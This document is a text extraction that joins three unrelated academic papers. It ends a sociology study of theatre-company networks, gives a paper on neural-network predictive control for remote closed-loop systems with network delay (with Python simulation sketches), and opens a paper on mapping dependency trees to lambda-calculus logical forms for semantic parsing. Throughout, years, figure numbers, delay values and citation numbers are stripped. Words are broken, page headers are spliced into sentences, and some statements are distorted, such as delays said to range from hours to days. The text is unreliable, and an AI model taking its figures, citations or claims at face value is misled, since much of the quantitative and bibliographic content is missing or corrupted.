effect based on audi- ence levels, and this polarizes the field into two separated groups of big and small companies which connect within their connections strategic and genetic networking | volume | issues & | insna.org group but not between the groups; we know that companies tend to reciprocally perform in one another’s venues and their relations are transitive, forming clusters of close collaborations. a description of the field based on- ly on individual attributes would not be sufficient to understand the way in which cultural agents occupy specific positions within the social space of the cultural pro- duction in a local territory. in our analyses model , compared to model , provides a more articulated image of the network, in which there are some endogenous mecha- nisms, such as reciprocity and transitivity, which contribute to shape the local cultural offer. these results, even though they come from a particular case, add some knowledge to our understanding of the cul- tural field. all the theoretical perspectives in line with a relational look on culture may be effectively integrated by the use of formal network methods. the idea of net- works as a complementary resource held by the cultural producers echoes bour- dieu’s definition of social capital. 
it is known that pierre bourdieu did not sympa- thize with network analysis; rather than looking for visible and direct links he aimed to capture invisible and objective social relations. technically bourdieu pur- sued this goal by using methods for detect- ing latent dimensions, such as the famous application of multiple correspondence analysis on tastes. but today in sociologi- cal and methodological literature there are empirical demonstrations of the compati- bility of the two approaches. as de nooy ( ) states, concrete relations (like the ones analyzed by social network analysis) may be useful to identify deeper field rela- tions; or, following bottero and crossley ( ), shared habitus can be explained by means of social processes such as mutual influence, which take place among people who also share interaction and concrete re- lationships. in our case we have shown that collaborative relations may support the ar- tistic activity of companies which look for venues in which to perform: companies who are able to convert their relations into shows get better chances in the market. this is close to an interpretation in terms of social capital conversion into economic capital, a hypothesis which would be in line with the bourdesian repertoire. furthermore, the aspects related to the ways in which theatre companies con- nect, forming reciprocal collaborations and closed triads, constitute genetic character- istics of cultural markets. these can inte- grate the analysis of the production of cul- ture perspective concerning the influence of the industry structure on the presence of particular products on the market. this is certainly an interesting topic, and one that is open to future research, because it bridg- es the analysis of production to the analy- sis of consumption. a possible future re- search question is: is there a relation be- tween the ways in which the producers re- late to each other and the types of products that they will offer? this topic was partial- ly addressed by paul dimaggio ( ) who proposed an approach to the study of cultural products starting from the knowledge of the market structure and productive processes. integrating such an approach with network insights would cer- tainly lead to innovative discoveries. last but not least, the relational di- mension of cultural production is a useful issue also for policy research. we know that networks support producers’ activity in many ways, providing resources, infor- mation, collaborations and so forth. a greater attention of policy makers to the re- lational dimension of cultural markets may encourage institutionalization processes aimed at diffusing the benefits of network- ing also to more isolated subjects and, like- ly, at integrating the lack of public eco- nomic resources. strategic and genetic networking connections insna.org | issues & | volume | references bagdadli, s. ( ). museum and theatre networks in italy: determinants and typology. international journal of arts management, ( ), pp. – . bastian m., heymann s., jacomy m. ( ). gephi: an open source software for exploring and manipu- lating networks. international aaai conference on weblogs and social media. becker, h.s. ( ). art worlds. university of cali- fornia press, berkeley. bertacchini, e., santagata, w. ( ). atmosfera crea- tiva. il mulino, bologna. blondel, v.d., jean-loup, g., lambiotte, r., lefebvre, e. ( ). fast unfolding of communi- ties in large networks. journal of statistical me- chanics: theory and experiment, ( ), p. . 
borgatti, s.p., everett, m.g., freeman, l.c. ( ). ucinet for windows: software for social network analysis. analytic technologies, harvard, ma. available at: https://sites.google.com/site/ucinetsoftware/home bottero, w., crossley, n. ( ). worlds, fields and networks: becker, bourdieu and the structures of social relations. cultural sociology, ( ), pp. – . bourdieu, p. ( ). the forms of capital. in richardson, j.g. (ed.), handbook of theory and research for the sociology of education. greenwood, new york, ny, pp. – . crossley, n. ( ). pretty connected: the social network of the early uk punk movement. theory, culture & society, ( ), pp. – . crossley, n. ( ). the man whose web expanded: network dynamics in manchester's post/punk music scene – . poetics, ( ), pp. – . crossley, n., mcandrew, s., widdop, p. ( ). social networks and music worlds. routledge, new york. d'ovidio, m. ( ). network locali nell'economia cognitiva-culturale. il caso di milano. rassegna italiana di sociologia, , pp. – . de nooy, w. ( ). fields and networks: correspondence analysis and social network analysis in the framework of field theory. poetics, ( ), pp. – . dimaggio, p. ( ). market structure, the creative process and popular culture: toward an organizational reinterpretation of mass-culture theory. journal of popular culture, ( ), pp. – . fox, e. ( ). bourdieu's relational view of interactions: a reply to bottero and crossley. cultural sociology, ( ), pp. – . gallelli, a. ( ). social structure and cultural production: an empirical analysis of festivals' networks. the journal of arts management, law, and society, ( ), pp. – . granovetter, m. ( ). economic action, social structure: the problem of embeddedness. american journal of sociology, , pp. – . handcock, m.s., hunter, d.r., butts, c.t., goodreau, s.m., morris, m. ( ). statnet: software tools for the representation, visualization, analysis and simulation of network data. journal of statistical software, ( ), p. . lazarsfeld, p.f., merton, r.k. ( ). friendship as a social process: a substantive and methodological analysis. in m. berger, t. abel and c. page (eds), freedom and control in modern society, pp. – . new york: van nostrand. lusher, d., koskinen, j., robins, g. ( ). exponential random graph models for social networks: theory, methods, and applications. cambridge university press, cambridge. mclean, p. ( ). culture in networks. john wiley & sons, hoboken. mcpherson, m., smith-lovin, l., cook, j.m. ( ). birds of a feather: homophily in social networks. annual review of sociology, , pp. – . milgram, s. ( ). the small world problem. psychology today, ( ), pp. – . mizzau, l., montanari, f. ( ). 'cultural districts and the challenge of authenticity: the case of piedmont, italy'. journal of economic geography, n. , pp. – . peterson, a., anand, n. ( ). the production of culture perspective. annual review of sociology, , pp. – . robins, g., pattison, p., kalish, y., lusher, d. ( ). an introduction to exponential random graph (p*) models for social networks. social networks, , pp. – . santagata, w. ( ). cultural districts, property rights and sustainable economic growth. international journal of urban and regional research, n. , pp. – . starkey, k., barnatt, c., tempest, s. ( ). beyond networks and hierarchies: latent organizations in the uk television industry. organization science, ( ), pp. – . trigilia, c. ( ). la costruzione sociale dell'innovazione. economia, società e territorio. firenze university press, firenze. uzzi, b., spiro, j.
( ). collaboration and creativity: the small world problem. american journal of sociology, ( ), pp. – . white, h. ( ). where do markets come from? american journal of sociology, , pp. – . widdop, p. ( ). music consumption: networks and omnivorism. in crossley, mcandrew, widdop (eds), social networks and music worlds. routledge, new york. appendix a figure a: goodness of fit plots, model . figure b: goodness of fit plots, model . figure c: diagnostics, model . research of network closed-loop control system based on the model predictive control (doi: . /ijanmc- - ) xu shuping, school of computer science & engineering, xi'an technological university, xi'an, china, e-mail: @qq.com; wang shuang, school of computer science & engineering, xi'an technological university, xi'an, china; guo yu, school of computer science & engineering, xi'an technological university, xi'an, china; su xiaohui, school of computer science & engineering, xi'an technological university, xi'an, china. abstract—the remote closed-loop control system suffers uncertain latency when information is transmitted over the internet; this paper analyzes how such delays influence the closed-loop control system. based on a neural-network predictive control method, it studies closed-loop control methods under random network delay. simulation results show that the method is able to reflect and predict the delay characteristics of the network path represented by the measured data and can replace the actual network when studying internet-based closed-loop control applications; the method is fast and accurate, can be used to learn the network model online and to predict the network delay value, and provides a new way to realize remote closed-loop control over the internet. keywords—remote control; neural network; network delay; model predictive control. i. introduction the remote control system is an integration of control technology and network communication technology; in recent years its applications in fields such as ocean development, space station maintenance, remote surgery and virtual reality have become more and more common, and stability, speed and accuracy are the principal targets a remote control system pursues[ ]. a closed-loop controller controls through feedback of disturbances: it compares the behavior of the system output with the expectation and uses the deviation to take the appropriate control action to eliminate the bias, in order to achieve the desired system performance. it has the ability to suppress interference, is not sensitive to changes in device characteristics, and can improve the response characteristics of the system. the delay phenomenon in remote control is a common problem in remote closed-loop control applications. delay exists not only in the forward control channel of the system but also in the feedback channel: delay in the forward channel prevents the control signal from acting on the controlled object in time, while delay in the feedback channel prevents the controller from observing changes of the controlled object immediately[ ].
the delay value is influenced by inherent properties of the control-information transmission network such as the network structure, the amount of data transmitted, the transmission timing, the transmission protocols and other factors[ ]; the delay values reasonably range from a few hours to several days[ ], and values of this magnitude bring a big problem for the stability and dynamic quality of the remote control system[ ]. analyzing and researching the delay problems of the remote control system is therefore a long-term topic in this area. ii. issues proposed a. the influence of delay on the stability of the remote control system delay has a large influence on the real-time behavior, accuracy and stability of the remote control system. the kinetic equation of a single-link robotic arm, a second-order remote control system, is as follows[ ]: $\frac{d^{2}\theta}{dt^{2}} + \frac{d\theta}{dt} + \sin\theta = u$, where $\theta$ represents the angle of the robot arm and $u$ represents the dc motor torque. the simulink block diagram of the mechanical arm is shown in figure . figure . simulink block diagram of the mechanical arm. since the forward channel and the feedback channel in a remote control system generally share the same physical link, the article assumes that the forward-channel and feedback-channel delay values are equal. first, set the delay time to , that is, without delay, and adjust the pid parameters to obtain a satisfactory response curve. secondly, keeping the pid parameters constant, increase the network delay value gradually: when the network delay value is set to . s we obtain the feedback curve in figure (a), and the performance of the system gradually deteriorates compared with the case without delay; when the network latency is increased to . s, the feedback curve in figure (b) shows that the system becomes oscillatory; continuing to increase the delay to . s, the feedback curve in figure (c) shows that the system response diverges, that is, the system becomes unstable. it can be seen that gradually increasing the delay makes the control system increasingly unstable. figure . the influence of remote control delay on the stability of the control system, panels (a)-(c). b. research on the stability of the remote control system there is a lot of research on improving the stability of the remote control system. in , ferrel pointed out that the time-varying nature of network delay needs attention in network control [ ]. halevi and ray in the literature[ ] used an augmented deterministic discrete-time model for periodic network delay. gregory c. walsh in the literature[ ] considered a nonlinear time-varying controller and controlled object, assuming no observation noise, and, based on nonlinear perturbation theory, described the impact of network delay on the system as a perturbation of the continuous-time system. walsh and bushnell in the literature [ ] proved that this method and its conclusions apply equally to linear systems. goktas in the literature [ ] treated the sensor-to-controller and controller-to-actuator delays as a bounded multiplicative uncertainty perturbation and provided a frequency-domain method of designing the ncs controller with robust control theory. the literature [ ] studied the robust passive control problem for a class of long-delay networked control systems, derived a passive controller design method, and proved the validity of the method through simulation. for short-delay networked control systems disturbed by white noise, the literature[ ] transformed the impact of the random delay on the system into unknown bounded uncertainties and, using robust control theory, gave the corresponding h∞ state observer design method. the literature[ ] converted the delay uncertainty into a perturbation of the closed-loop system parameters, proposed conditions for the existence of a robust guaranteed-cost control law based on robust control theory and the lyapunov stability principle, and gave a method of designing a robust guaranteed-cost state-feedback controller for networked control by solving a linear matrix inequality. research shows that adjusting the pid controller parameters can in fact make an unstable closed-loop control system stable and meet the requirements of remote control systems with modest real-time demands. modifying the pid parameters of the control system and setting the network delay to . s again yields the feedback curve shown in figure ; this shows that modifying the pid control parameters has indeed improved the stability of the control system. figure . response after adjusting the pid parameters at a . second time delay. c. question proposed the pid control parameters need to be adjusted dynamically and constantly with the size of the control system delay and other system parameters, so having the controlled object dynamically adapt its pid values in an unknown working environment becomes another problem that remote intelligent control systems face. this paper builds on the method of modifying the pid control parameters to improve the stability of the remote control system, and proposes an intelligent remote control system design method with adaptive capability under random delay, based on neural network theory. iii. question analysis for the remotely controlled single-link manipulator, set the sampling period in figure to . s and take the delay value as . s. the control information at time k is transmitted to the controller after . s; relative to the system sampling time of . s, by the moment the controller receives the status information of time k a sampling point has already passed and the state of the system has become the state at time k + ; that is, the state at time k is fed back to the pid controller at time k + . for the pid controller at time k, the state at time k + has not yet arrived, and the system state value at time k − has only just been passed to the controller after one sampling-time delay; therefore, the controller can only decide the control value u(k) to be imposed at time k on the basis of the state at time k − , and this control value can only really act on the system after a further transmission delay, by which time, at time k + , the state of the system has turned into x(k + ), while u(k) was produced from the state at time k − , so u(k − ) and u(k + ) differ by two sampling cycles. in these two sampling cycles the system state undergoes a transition, that is, x(k − ) transfers to x(k + ); x(k − ) and x(k + ) are often different, which leads to u(k − ) and u(k + ) being different. in other words, the system control value is offset, and the greater the delay the greater the offset, which is the root cause of the deterioration of the closed-loop control performance and even instability.
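the destabilizing effect described above can be reproduced with a small simulation: a pid loop closed over a single-link arm whose measurement reaches the controller several samples late, a crude stand-in for the network delay in the feedback channel. this is only an illustrative python sketch; the arm dynamics, pid gains and delay values are invented for the example and are not the values used in the paper.

```python
import numpy as np

def simulate(delay_steps, kp=8.0, ki=2.0, kd=1.0, dt=0.01, t_end=10.0):
    """pid control of a single-link arm (theta'' = -sin(theta) - theta' + u)
    where the controller only sees the angle measured delay_steps samples ago."""
    theta, omega = 0.0, 0.0
    setpoint = 1.0                       # desired arm angle in radians
    integral, prev_err = 0.0, 0.0
    buffer = [0.0] * (delay_steps + 1)   # delayed measurements
    peak = 0.0
    for _ in range(int(t_end / dt)):
        measured = buffer[0]             # stale measurement reaches the pid
        err = setpoint - measured
        integral += err * dt
        deriv = (err - prev_err) / dt
        prev_err = err
        u = kp * err + ki * integral + kd * deriv
        # plant update with explicit euler integration
        omega += (-np.sin(theta) - omega + u) * dt
        theta += omega * dt
        if not np.isfinite(theta):       # the loop has diverged
            return float("inf")
        buffer.append(theta)
        buffer.pop(0)
        peak = max(peak, abs(theta))
    return peak

for steps in (0, 10, 30):                # 0.00 s, 0.10 s and 0.30 s of delay
    print(f"delay {steps * 0.01:.2f} s -> peak |theta| = {simulate(steps):.2f}")
```

with these illustrative settings the peak error typically grows sharply as the feedback delay increases, mirroring the qualitative behaviour reported for the figures above.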
the above analysis shows that the performance deterioration caused by the remote network delay arises because the controller cannot correctly calculate the amount of control to exert on the system. if the system model is known and the size of the delay is known, then the state of the system can be forecast according to the principle of predictive compensation, and the control value to be applied can be calculated from the predicted state. that is, at time k the predicted state x̂(k + ) at time k + , rather than the state x(k − ) at time k − , is used to compute the control to apply to the system; the resulting control value u(k + ) for the actual time k + , after a transmission delay, reaches the system at time k + just one sampling period later, by which time the state of the system has changed into x(k + ). therefore, if the predicted state x̂(k + ) is infinitely close to the actual state x(k + ), the performance of the closed-loop control system with network delay can be infinitely close to the performance of the closed-loop control system without delay links; this is the basic idea of the model predictive control. however, the delay of the control network is time-varying and controlled objects are often subject to confounding factors, so a fixed, inaccurate model cannot be used to predict the state of the system, and a specific delay time cannot be used to do fixed-step predictive control. a neural network has the advantage of learning the state of the system online, and predictive control based on a neural network is strongly robust and adaptive to changes in the system state and the network delay; it is therefore a way to solve closed-loop control under network latency. iv. building the model predictive control law according to the running state of the system over past time and at the present moment, the desired output value of the system at future moments is forecast more accurately, and the control value that should be added to the system is calculated from the desired output according to a certain optimization algorithm [ ]; this is adaptive computer control with online solution of the control value [ ]. the method includes three steps: prediction model, rolling optimization and feedback correction[ ]. a. the prediction model the module describing the behavior of the controlled object in neural-network-based predictive control is a forward model of the system. the training method shown in figure is used, where the dashed box shows the actual controlled object, here the simulink block diagram of the robotic arm, which produces output y from a random input signal u. a bp neural network with one hidden layer is selected as the training model of the controlled object; the number of hidden-layer neurons is set to , the levenberg–marquardt learning rule is used, and the collected [u, y] data groups are used to train the neural network model of the controlled object. the results are shown in figure , where figure (a) is the data used for training and figure (b) is the convergence diagram of the training [ ]. figure . neural network training block diagram of the manipulator. b. receding horizon optimization rolling optimization is an optimal control algorithm that uses the output of rolling finite-horizon optimization, that is, the goal of the optimization moves forward over time. predictive control formulates an optimization index based on the current moment at every time step instead of using a global optimization index.
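the prediction-model step can be sketched in a few lines of python: drive a toy plant with a random input signal, record the [u, y] pairs, and fit a one-hidden-layer network as a forward model of the controlled object. the plant equations, the layer size and the use of plain batch gradient descent instead of levenberg–marquardt training are simplifications made for this sketch rather than the settings of the paper.

```python
import numpy as np

rng = np.random.default_rng(0)

def plant_step(theta, omega, u, dt=0.05):
    """toy single-link arm used as the controlled object."""
    omega = omega + (-np.sin(theta) - omega + u) * dt
    theta = theta + omega * dt
    return theta, omega

def collect_data(n=2000):
    """drive the plant with a random input signal and record [u, y] pairs."""
    theta = omega = 0.0
    xs, ys = [], []
    for _ in range(n):
        u = rng.uniform(-2.0, 2.0)
        xs.append([theta, omega, u])      # input: current state and control
        theta, omega = plant_step(theta, omega, u)
        ys.append([theta, omega])         # target: next state
    return np.array(xs), np.array(ys)

def train_forward_model(x, y, hidden=16, epochs=300, lr=0.05):
    """one-hidden-layer forward model fitted with batch gradient descent."""
    w1 = rng.normal(0.0, 0.5, (x.shape[1], hidden)); b1 = np.zeros(hidden)
    w2 = rng.normal(0.0, 0.5, (hidden, y.shape[1])); b2 = np.zeros(y.shape[1])
    for _ in range(epochs):
        h = np.tanh(x @ w1 + b1)
        err = h @ w2 + b2 - y             # prediction error
        g2 = h.T @ err / len(x)
        gh = (err @ w2.T) * (1.0 - h ** 2)
        w2 -= lr * g2; b2 -= lr * err.mean(0)
        w1 -= lr * x.T @ gh / len(x); b1 -= lr * gh.mean(0)
    return w1, b1, w2, b2, float((err ** 2).mean())

x, y = collect_data()
*_, final_mse = train_forward_model(x, y)
print("training mse of the forward model:", round(final_mse, 5))
```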
although the locality of the rolling optimization index means that it can only attain the global optimal solution in the ideal case, when there is model mismatch, time variation, nonlinearity or confounding factors this uncertainty can be taken into account and compensated in a timely manner, reducing the deviation and keeping the control close to the actual optimum; it is also easy to use finite-time-domain input/output values to rapidly identify the state of the controlled object, so as to adjust the control law online through repeated optimization. figure . neural network model training results for the manipulator: (a) data used for training; (b) convergence diagram of training. the optimization algorithm in this article is also realized with a neural network: the time domain involved in the optimization is set to , a bp neural network with hidden-layer neurons is used, and the same levenberg–marquardt learning rule performs online training to achieve continuous optimization of the control signal. the training block diagram is shown in the dashed box in figure . the neural network optimizer, given the reference input signal u, produces a predicted control output; this predicted control is applied to the neural network model of the controlled object to produce a predicted output, which is compared with the desired output of the system, and the difference is used to train the neural network optimizer. then, once the error e is small enough, the optimizer output is applied as the actual control to the actual controlled object. evidently, the optimizer in this regulation scheme is the inverse model of the controlled object. the predicted output can also be compared with the actual output y, and the resulting error e, together with the actual input u and output y of the controlled object, serves as data for training the neural network model of the controlled object. c. feedback correction feedback correction means that predictive control keeps dynamically correcting the prediction model to ensure that it stays infinitely close to the actual controlled object, so that the optimization algorithm is established on the basis of a correct prediction of the system state before each new optimization. the error e in figure drives the correction process of the neural network model of the controlled object. the neural network prediction model is built on the basis of past run data of the system; the new operating environment and the nonlinearity, time variation, interference and other factors of the actual system make it necessary for the neural-network-based prediction model to keep learning, modifying its weights and even its structure, to ensure that it can represent the actual controlled object well for control-signal prediction. v. simulation analyses figure . simulink simulation of the network closed-loop control system based on neural network predictive control. the simulation block diagram shown in figure is built in the robotic arm simulink environment; the network is trained for neural-network-based predictive control by the steps in figures to , and the delay value is adjusted gradually under the same random input signal for simulation. the results in figure show that predictive control based on the neural network has good control performance for a fixed-delay network.
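the interplay of rolling optimization and feedback correction can be seen in the short loop below: at every step a finite-horizon cost is minimized with a prediction model, only the first control value is applied to the plant, and the next optimization restarts from the freshly measured state. the linearized one-step model stands in for the trained neural network forward model, the coarse grid search stands in for the neural optimizer, and all constants are illustrative.

```python
import numpy as np

def plant_step(theta, omega, u, dt=0.05):
    """'true' single-link arm used as the controlled object (illustrative dynamics)."""
    omega = omega + (-np.sin(theta) - omega + u) * dt
    theta = theta + omega * dt
    return theta, omega

def model_step(theta, omega, u, dt=0.05):
    """approximate prediction model: a small-angle linearization stands in
    for the trained neural network forward model."""
    omega = omega + (-theta - omega + u) * dt
    theta = theta + omega * dt
    return theta, omega

def receding_horizon_control(setpoint=1.0, horizon=5, steps=200):
    candidates = np.linspace(-3.0, 3.0, 61)      # coarse search over constant controls
    theta = omega = 0.0
    trajectory = []
    for _ in range(steps):
        best_u, best_cost = 0.0, float("inf")
        for u in candidates:                     # rolling optimization over the horizon
            th, om, cost = theta, omega, 0.0
            for _ in range(horizon):
                th, om = model_step(th, om, u)
                cost += (setpoint - th) ** 2 + 0.01 * u ** 2
            if cost < best_cost:
                best_cost, best_u = cost, u
        # apply only the first control, then re-measure the real plant:
        # the next optimization starts from the measured state (feedback correction)
        theta, omega = plant_step(theta, omega, best_u)
        trajectory.append(theta)
    return np.array(trajectory)

traj = receding_horizon_control()
print("final angle:", round(traj[-1], 3))
```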
further, the random delay module shown in figure (a) was used instead of the fixed delay module in figure ; the delay characteristics of the random delay module for the input are shown in figure (b), where the in.mat file stores the random input signal of figure . the random input signal stored in this file is used so that the simulation results can be compared. finally, the simulation under random delay conditions and its results are shown in figure (c). whether under a fixed delay or a random delay, the neural network predictive controller can satisfy the closed-loop control requirements under network delay conditions. figure . predictive-control response curves based on the neural network under the random input signal: (a) response curve, delay . s; (b) response curve, delay . s. figure . responses under random delay: (a) delay curve under random delay; (b) response curve under random delay. vi. conclusion this article discusses the difficulty of remote closed-loop control, which differs from a general control system in that the forward channel and the feedback channel of the system contain uncertain network delay, which greatly reduces the stability of the system and increases the difficulty of control system design. this paper elaborated the network closed-loop control problems arising from uncertain network delay, including the network-delay controller design method, studied the impact of network transmission delay on the network closed-loop control system, proposed predictive control based on a neural network to solve the feasibility of closed-loop control for network control systems with random delay, and verified the validity of the method by simulation. acknowledgment the authors wish to thank the cooperators. this research is partially funded by the national network engineering testing lab fund project (gsysj ). references [ ] zhang wei, michael s. branicky, stephen m. phillips, stability of networked control systems[j], ieee control systems magazine, february , ( ): - . [ ] almutairi naif b, chow moyuen, pi parameterization using adaptive fuzzy modulation (afm) for networked control systems, part i: partial adaptation[j]. ieee proceedings of iecon , sevilla, spain, : - . [ ] goodwin c, juan carlos aguero, arie feuer, state estimation for systems having random measurement delays using errors in variables[c], the th triennial world congress, barcelona, spain, . [ ] lee kyung chang, lee suk, remote controller design of networked control system using genetic algorithm[c], isie , pusan, korea, ieee, : - . [ ] huang j q, lewis f l, liu k a, neural predictive control for telerobots with time delay[j]. journal of intelligent and robotic systems, , : - . [ ] lian fengli, analysis, design, modeling, and control of networked control systems[d], ph.d. thesis, the university of michigan, . [ ] ferrel w r. remote manipulation with transmission delay[j]. ieee transactions on human factors in electronics, , fe - ( ): - . [ ] halevi y, ray a. integrated communication and control systems: part i, analysis[j]. journal of dynamic systems, measurement and control, , ( ): - . [ ] walsh g c, beldiman o, bushnell l g. asymptotic behavior of nonlinear networked control systems[j]. ieee transactions on automatic control, , ( ): - . [ ] gregory c walsh, octavian beldiman, linda bushnell. error encoding algorithms for networked control systems[c]. proceedings of the th conference on decision and control, phoenix, , : - .
[ ] göktas f. distributed control of systems over communication networks[d]. ph.d. dissertation. philadelphia, pa, usa: university of pennsylvania, . [ ] sun haiyi, li ning. robust passive control of long delay network control system[j]. computing technology and automation, , ( ): - . [ ] zhu zhangqing, zhou chuan, hu weili. robust h∞ state observer design of short delay network control systems[j]. control and decision, , ( ). [ ] zhang ximin, li jiandong, zhang jianguo. robust guaranteed cost control of network control systems[j]. xi'an electronic technology university, , ( ): - . [ ] huang j q, lewis f l, liu k a, neural predictive control for telerobots with time delay[j]. journal of intelligent and robotic systems, , : - . [ ] chen s, c.f.n. cowan, and p.m. grant, orthogonal least squares learning algorithm for radial basis function networks[j], ieee transactions on neural networks, ( ): - . [ ] huang j q, lewis f l, liu k a, neural predictive control for telerobots with time delay[j]. journal of intelligent and robotic systems, , : - . [ ] chen s, c.f.n. cowan, and p.m. grant, orthogonal least squares learning algorithm for radial basis function networks[j], ieee transactions on neural networks, ( ): - . transforming dependency structures to logical forms for semantic parsing siva reddy†a oscar täckström‡ michael collins‡b tom kwiatkowski‡ dipanjan das‡ mark steedman† mirella lapata† †ilcc, school of informatics, university of edinburgh ‡google, new york siva.reddy@ed.ac.uk {oscart, mjcollins, tomkwiat, dipanjand}@google.com {steedman, mlap}@inf.ed.ac.uk abstract the strongly typed syntax of grammar formalisms such as ccg, tag, lfg and hpsg offers a synchronous framework for deriving syntactic structures and semantic logical forms. in contrast—partly due to the lack of a strong type system—dependency structures are easy to annotate and have become a widely used form of syntactic analysis for many languages. however, the lack of a type system makes a formal mechanism for deriving logical forms from dependency structures challenging. we address this by introducing a robust system based on the lambda calculus for deriving neo-davidsonian logical forms from dependency trees. these logical forms are then used for semantic parsing of natural language to freebase. experiments on the free and webquestions datasets show that our representation is superior to the original dependency trees and that it outperforms a ccg-based representation on this task. compared to prior work, we obtain the strongest result to date on free and competitive results on webquestions. introduction semantic parsers map sentences onto logical forms that can be used to query databases (zettlemoyer and collins, ; wong and mooney, ), instruct robots (chen and mooney, ), extract information (krishnamurthy and mitchell, ), or describe visual scenes (matuszek et al., ). current systems accomplish this by learning task-specific grammars (berant et al., ), by using strongly-typed ccg grammars (reddy et al., ), or by eschewing the use of a grammar entirely (yih et al., ). a work carried out during an internship at google. b on leave from columbia university. disney acquired pixar nnp vbd nnp nsubj dobj root (a) the dependency tree for disney acquired pixar. (nsubj (dobj acquired pixar) disney) (b) the s-expression for the dependency tree. λx.∃yz. acquired(xe) ∧ disney(ya) ∧ pixar(za) ∧ arg (xe,ya) ∧ arg (xe,za) (c) the composed lambda-calculus expression.
figure : the dependency tree is binarized into its s-expression, which is then composed into the lambda expression representing the sentence logical form. in recent years, there have been significant advances in developing fast and accurate dependency parsers for many languages (mcdonald et al., ; nivre et al., ; martins et al., , inter alia). motivated by the desire to carry these advances over to semantic parsing tasks, we present a robust method for mapping dependency trees to logical forms that represent underlying predicate-argument structures (by "robust", we refer to the ability to gracefully handle parse errors as well as the untyped nature of dependency syntax). we empirically validate the utility of these logical forms for question answering from databases. since our approach uses dependency trees as input, we hypothesize that it will generalize better to domains that are well covered by dependency parsers than methods that induce semantic grammars from scratch. the system that maps a dependency tree to its logical form (henceforth deplambda) is illustrated in figure . first, the dependency tree is binarized via an obliqueness hierarchy to give an s-expression that describes the application of functions to pairs of arguments. each node in this s-expression is then substituted for a lambda-calculus expression and the relabeled s-expression is beta-reduced to give the logical form in figure (c). since dependency syntax does not have an associated type theory, we introduce a type system that assigns a single type to all constituents, thus avoiding the need for type checking (section ). deplambda uses this system to generate robust logical forms, even when the dependency structure does not mirror predicate-argument relationships in constructions such as conjunctions, prepositional phrases, relative clauses, and wh-questions (section ). these ungrounded logical forms (kwiatkowski et al., ; reddy et al., ; krishnamurthy and mitchell, ) are used for question answering against freebase, by passing them as input to graphparser (reddy et al., ), a system that learns to map logical predicates to freebase, resulting in grounded freebase queries (section ). we show that our approach achieves state-of-the-art performance on the free dataset and competitive performance on the webquestions dataset, whereas building the freebase queries directly from dependency trees gives significantly lower performance. finally, we show that our approach outperforms a directly comparable method that generates ungrounded logical forms using ccg. details of our experimental setup and results are presented in section and section , respectively. logical forms we use a version of the lambda calculus with three base types: individuals (ind), events (event), and truth values (bool). roughly speaking, individuals are introduced by nouns, events are introduced by verbs, and whole sentences are functions onto truth values. for types a and b, we use a×b to denote the product type, while a → b denotes the type of functions mapping elements of a to elements of b.
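to make the single semantic type ind × event → bool concrete, the sketch below (in python, purely for illustration) treats a logical form as a function from an (individual, event) pair to a boolean and evaluates the disney acquired pixar example against a handful of invented facts; the variable domains and the fact set are made up for the example.

```python
from typing import Callable, Tuple

# a toy domain: individuals and events are just strings
Ind, Event = str, str
Pair = Tuple[Ind, Event]
Expr = Callable[[Pair], bool]   # every constituent denotes ind x event -> bool

# toy facts standing in for a tiny database (illustrative, not freebase)
unaries = {"acquired": {"e1"}, "disney": {"d"}, "pixar": {"p"}}
binaries = {"arg1": {("e1", "d")}, "arg2": {("e1", "p")}}

def exists(pred: Callable[[Pair], bool]) -> bool:
    """existential closure over a small set of candidate (ind, event) pairs."""
    inds = {"d", "p", "none"}
    events = {"e1", "none"}
    return any(pred((a, e)) for a in inds for e in events)

# the composed logical form for "disney acquired pixar":
# lambda x. exists y z. acquired(x_e) & disney(y_a) & pixar(z_a)
#                     & arg1(x_e, y_a) & arg2(x_e, z_a)
sentence: Expr = lambda x: exists(lambda y: exists(lambda z:
    x[1] in unaries["acquired"]
    and y[0] in unaries["disney"]
    and z[0] in unaries["pixar"]
    and (x[1], y[0]) in binaries["arg1"]
    and (x[1], z[0]) in binaries["arg2"]))

print(exists(sentence))   # True: the toy facts support the sentence
```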
we will make extensive use of variables of type ind × event. for any variable x of type ind × event, we use x = (xa,xe) to denote the pair of variables xa (of type ind) and xe (of type event). here, the subscript denotes the projections ·a : ind× event → ind and ·e : ind×event → event. an important constraint on the lambda calculus system is as follows: all natural language con- stituents have a lambda-calculus expression of type ind×event → bool. a “constituent” in this definition is either a sin- gle word, or an s-expression. s-expressions are defined formally in the next section; examples are (dobj acquired pixar) and (nsubj (dobj acquired pixar) disney). essen- tially, s-expressions are binarized dependency trees, which include an ordering over the different dependencies to a head (in the above the dobj modifier is combined before the nsubj modifier). some examples of lambda-calculus expressions for single words (lexical entries) are as follows: acquired ⇒ λx. acquired(xe) disney ⇒ λy. disney(ya) pixar ⇒ λz. pixar(za) an example for a full sentence is as follows: disney acquired pixar ⇒ λx.∃yz. acquired(xe) ∧ disney(ya) ∧pixar(za) ∧ arg (xe,ya) ∧ arg (xe,za) this is a neo-davidsonian style of analysis. verbs such as acquired make use of event variables such as xe, whereas nouns such as disney make use of individual variables such as ya. the restriction that all expressions are of type ind × event → bool simplifies the type system considerably. while it leads to difficulty with some linguistic constructions—see section . for some examples—we believe the simplicity and robustness of the resulting system outweighs these concerns. it also leads to some spurious variables that are bound by lambdas or existentials, but which do not appear as arguments of any predicate: for example in the above analysis for disney acquired pixar, the variables xa, ye and ze are unused. however these “spurious” vari- ables are easily identified and discarded. an important motivation for having variables of type ind×event is that a single lexical item some- times makes use of both types of variables. for exam- ple, the noun phrase president in has semantics λx.∃y. president(xa) ∧ president event(xe)∧ arg (xe,xa) ∧ (ya) ∧ prep.in(xe,ya) in this example president introduces the predi- cates president, corresponding to an individual, and president event, corresponding to an event; essen- tially a presidency event that may have various prop- erties. this follows the structure of freebase closely: freebase contains an individual corresponding to barack obama, with a president property, as well as an event corresponding to the obama presidency, with various properties such as a start and end date, a location, and so on. the entry for president is then λx. president(xa) ∧ president event(xe) ∧ arg (xe,xa) note that proper nouns do not introduce an event predicate, as can be seen from the entries for disney and pixar above. dependency structures to logical forms we now describe the system used to map dependency structures to logical forms. we first give an overview of the approach, then go into detail about various linguistic constructions. . an overview of the approach the transformation of a dependency tree to its logical form is accomplished through a series of three steps: binarization, substitution, and composition. below, we outline these steps, with some additional remarks. binarization. a dependency tree is mapped to an s-expression (borrowing terminology from lisp). 
